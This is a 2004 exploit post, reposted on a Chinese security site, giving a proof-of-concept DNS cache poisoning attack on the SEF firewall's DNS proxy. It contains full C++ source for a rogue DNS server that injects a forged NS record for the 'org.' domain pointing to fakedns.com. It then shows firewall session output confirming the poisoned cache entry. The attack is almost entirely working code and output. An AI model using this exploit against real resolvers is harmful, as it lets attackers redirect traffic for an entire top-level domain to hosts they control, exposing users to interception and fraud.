首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PoC poisoning cache attack SEF 8 and later
来源:www.datafull.com 作者:fryxar 发布时间:2004-06-28  

PoC poisoning cache attack SEF 8 and later


#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
// close down the server system
pos_setquitflag();
}

int main(int argc, char **argv) {
_addr a;

try {
/* get command-line arguments */
if (argc != 2 ) {
printf( "Usage: %s [domainname]\n", argv[0] );
return 1;
} else {
dyndomain = argv[1];
txt_to_addr(&a, "any");
}

poslib_config_init();

/* bring up posadis */
servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

// use the posadis logging system
pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");

// set signal handlers
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);

// set query function
handle_query = my_handle_query;

// run server
posserver_run();
} catch (PException p) {
printf("Fatal exception: %s\n", p.message);
return 1;
}

return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;

/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;

if (query->message->questions.begin() ==
query->message->questions.end()) {
/* query did not contain question */
a->RCODE = RCODE_QUERYERR;
return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;

pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
str_qtype(q.QTYPE).c_str());

if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); //
Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->answers.push_back(rr);

rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->authority.push_back(rr);

rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->additional.push_back(rr);
} else {
/* we don't want this */
a->RCODE = RCODE_SRVFAIL;
}
return a;
}
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

and now, in your SEF Firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache

firewall # nslookup afraid.org 127.0.0.1 # Caching org. NS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: afraid.org
Addresses: 69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
172775 NS TLD2.ULTRADNS.NET.
172775 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: fryxar.afraid.org
Address: 200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
3567 NS fakedns.com. <- Ooohh!
3567 NS TLD2.ULTRADNS.NET.
3567 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

And now SEF "thinks" that fakedns.com server is an authoritative
nameserver of "org." domain, learned by fryxar.afraid.org DNS server
that is only authoritative for the fryxar.afraid.org domain.
--
fryxar <fryxar@datafull.com>




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Remote D.O.S WinAgents TFTP Se
·Rlpr <=2.04 msg() Remote fo
·Ircd-Hybrid-7/Ircd-Ratbox Low-
·Windows XP UPNP exploit
·c/s型asp木马
·MPlayer GUI filename handling
·serv-u本地权限提升工具
·phpMyAdmin PHP Code Injection
·ASP版SQLSERVER注射数据表结构猜
·FreeBSD Local DoS Exploit
·TCP Window Size RST
·Microsoft IE Remote Applicatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved